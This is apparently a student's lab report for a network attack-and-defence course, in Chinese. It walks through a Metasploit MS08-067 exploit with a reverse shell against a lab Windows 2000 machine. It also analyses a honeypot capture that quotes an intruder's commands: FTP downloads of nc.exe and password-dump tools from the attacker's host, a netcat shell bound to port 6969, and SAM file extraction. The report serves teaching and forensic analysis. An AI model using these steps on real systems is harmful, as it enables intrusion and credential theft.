20212937 曾俊铭

20212937 曾俊铭 2021-2022-2 《网络攻防实践》第八周实践报告

1.实践内容

使用metasploit软件进行windows远程渗透,利用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。
攻击者成功攻陷了一台由rfp部署的蜜罐主机,要求提取并分析攻击的全部过程(攻击者使用了什么破解工具进行攻击,如何使用这个破解工具进入并控制了系统,获得系统访问权限后做了什么,如何防止这样的攻击)
windows系统远程渗透攻击和分析:
攻方使用metasploit选择漏洞进行攻击,获得控制权
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息


2.实践过程

实践一:Metasploit Windows Attacker
任务:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
环境:Kali攻击机(192.168.200.2) Windows2K Server靶机(192.168.200.3)

(1)Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console终端模式,第三种是CLI(命令行)模式。msfcli 不提供交互,这里使用最常用的msfconsole
image

(2)输入msfconsole,运行此命令后将进入msf 命令提示符: msf>
image

(3)查找ms08_067漏洞,msf > search ms08_067
image

由上图可知,渗透攻击模块路径为“exploit/windows/smb/ms08_067_netapi”,其中exploit代表模块类型,windows代表目标平台,smb代表目标服务,ms08_067_netapi代表模块名字。模块的源代码文件在Metasploit的安装路径加上这条路径的目录下存着

(4)使用MS08_067漏洞:use exploit/windows/smb/ms08_067_netapi,接着查看攻击载荷基本信息:show payloads,如下图所示:
image

(5)选择其中的generic/shell_reverse_tcp,即回连至控制端的后门,如下图所示:
image

(6)首先查看所需的配置选项,如下图所示:
image

(7)再对各个选项进行配置,把RHOST设置为靶机ip:192.168.200.3;把LPORT,即后门回连的端口设置为5000;把LHOST设置为攻击机ip,即192.168.200.2;设置target,即目标系统类型为0。如下图所示
image

(8)再次查看配置选项,确保没有错误,如下图所示:
image

经确认,配置是正确的。

(9)使用exploit命令发起渗透攻击,再使用ipconfig /all查看IP地址及主机名,确认攻击成功,如下图所示:
image

image


实践二:
来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
1)攻击者使用了什么破解工具进行攻击
2)攻击者如何使用这个破解工具进入并控制了系统
3)攻击者获得系统访问权限后做了什么
4)我们如何防止这样的攻击
5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

1)首先用wireshark打开那个snort文件。点击 统计-http-请求,可以看到本次攻击的代码
image

image

image

设置限定条件为:ip.addr==172.16.1.106 and http
image

boot.ini是NT系统的启动文件。而前面的..%c0af..是"/"的Unicode编码
然后我们可以看到攻击者试图向服务器获取一个msadcs.dll文件,执行shell脚本数据为shell ( “cmd /c echo werd >> c : f u n ” ),根据ADM!ROX!YOUR!WORLD特征字符串,表明是msadc(2).pl工具发起的渗透攻击
image

因此可以得出,攻击者利用了Unicode和msadcs(2).pl工具进行攻击

2)攻击者如何使用这个破解工具进入并控制了系统?
在Wireshark中输入ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && http.request.method == "POST"进行过滤,得到SQL语言代码,简化处理后得到shell脚本代码
shell ( “cmd /c echo hacker 2000 >> ftpcom” ) ;
shell ( “cmd /c echo get samdump .dll >> ftpcom” ) ;
shell ( “cmd /c echo get pdump .exe >> ftpcom” ) ;
shell ( “cmd /c echo get nc.exe>>ftpcom” ) |;
shell ( “cmd /c echo quit>>ftpcom” );
shell ( “cmd /c ftp – s : ftpcom- n www.nether.net” )
image

在 179 号数据包追踪 TCP 流,可以看到如下指令,攻击者创建了一个 ftpcom 脚本:
cmd /c echo user johna2k > ftpcom
image

在 299 号数据包追踪 TCP 流,发现攻击者试图连接至 FTP 服务器 204.42.253.18,但未成功
image

在1106 号数据包,FTP 连接成功:
image

查找ftp连接成功以前的指令,得到如下指令:
copy C:winntsystem32cmd.exe cmd1.exe
c echo open 213.116.251.162 >ftpcom
c echo johna2k >>ftpcom
c echo haxedj00 >>ftpcom
c echo get nc.exe >>ftpcom
c echo get pdump.exe >>ftpcom
c echo get samdump.dll >>ftpcom
c echo quit >>ftpcom
继续查看到 1224 号数据包,看到攻击者执行了:cmd1.exe /c nc -l -p 6969 -e cmd1.exe,表示攻击者连接了 6969 端口,并且获得了访问权限。
image

3)攻击者获得系统访问权限后做了什么
筛选 tcp.port == 6969,并追踪 TCP 流:
image

接着我们可以看到攻击者尝试进入但失败
image

接着列出了用户
image

然后发了一个 echo 消息到 C 盘根目录文件 README.NOW.Hax0r:
image

然后删除了许多文件:
image

使用 rdisk 尝试获得 SAM 口令文件(安全账号管理器),rdisk 是磁盘修复程序,执行 rdisk /s- 备份关键系统信息,在 /repair 目录中就会创建一个名为 sam._ 的 SAM 压缩拷贝,并且攻击者把这个文件拷贝到 har.txt 并打印:
image

image

image

最后离开
image

4)我们如何防止这样的攻击
升级系统到最新的稳定版本并且要及时更新微软官方的漏洞补丁

5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
在 4351 号数据包,攻击者留下记录:
image

因此攻击者应该是警觉了目标为一台蜜罐主机


实践三:
团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
实验环境:
kali:192.168.200.2(攻击机)
win2k:192.168.200.3(靶机)

当我的Kali虚拟机作为攻击方攻击对方的靶机Win2kServer时,对靶机上的MS08-067漏洞进行远程渗透攻击,具体攻击过程与前面实践一一致,如图显示攻击成功
image

此时我已经获取对方的Win2kServer的访问权,并能远程在对方的WINNT目录创建文件“ZJM”
image

对方主机WINNT目录确有文件“ZJM”,表明渗透攻击成功
image

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息
实验环境
kali:192.168.200.2(攻击机)
win2k:192.168.200.3(靶机)
当Kali虚拟机作为攻击方攻击我的靶机Win2kServer时,对其MS08-067漏洞进行远程渗透攻击,具体攻击过程仍与前面一致,如图我打开Wireshark,监听到对方对我的攻击过程。
image

并且在我的靶机Win2kServer上发现对方在我的WINNT目录下创建了文件“XXF(我队友)”
image


3.学习中遇到的问题及解决

  • 问题1:没有设置回连端的控制后门
  • 问题1解决方案:
    image

4.实践总结

这个实验很多东西都不会,在网上查找了很多资料,也看了其他同学怎么做的,对于原理还有待深入理解,特别是命令行还有很多不清楚,不过难不可怕,要有自信,要多花时间去理解。

posted on 2022-04-23 16:55  曾俊铭  阅读(21)  评论(0编辑  收藏  举报

导航